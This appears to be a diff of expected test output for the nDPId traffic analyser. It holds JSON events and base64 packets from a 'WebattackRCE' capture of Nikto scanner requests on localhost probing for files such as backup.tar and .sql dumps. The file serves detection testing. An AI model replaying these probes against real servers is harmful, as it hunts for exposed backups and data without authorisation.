-01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277279,"pkt":"AAAAAAAAAAAAAAAACABFAADCyNdAAEAGc1x\/AAABfwAAAcSEH5CsG\/B+ct073oAYAED+tgAAAQEICp1m\/UedZv1HR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277281,"pkt":"AAAAAAAAAAAAAAAACABFAADFYHdAAEAG27l\/AAABfwAAAcSGH5C8uFjeIpIdX4AYAED+uQAAAQEICp1m\/UidZv1IR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277282,"pkt":"AAAAAAAAAAAAAAAACABFAADFoI1AAEAGm6N\/AAABfwAAAcSIH5D0M5gk0yESEIAYAED+uQAAAQEICp1m\/UqdZv1KR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277283,"pkt":"AAAAAAAAAAAAAAAACABFAADDBOlAAEAGN0p\/AAABfwAAAcSKH5Dv6jxQN18efIAYAED+twAAAQEICp1m\/UudZv1LR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277284,"pkt":"AAAAAAAAAAAAAAAACABFAADDCzNAAEAGMQB\/AAABfwAAAcSMH5CEzzOZEWOd+IAYAED+twAAAQEICp1m\/UydZv1MR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277286,"pkt":"AAAAAAAAAAAAAAAACABFAAC9CzBAAEAGMQl\/AAABfwAAAcSOH5AKIDOIyoTTQIAYAED+sQAAAQEICp1m\/U2dZv1NR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277288,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JlVAAEAGFeR\/AAABfwAAAcSQH5Clfx76D\/AiGIAYAED+sQAAAQEICp1m\/VCdZv1QR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 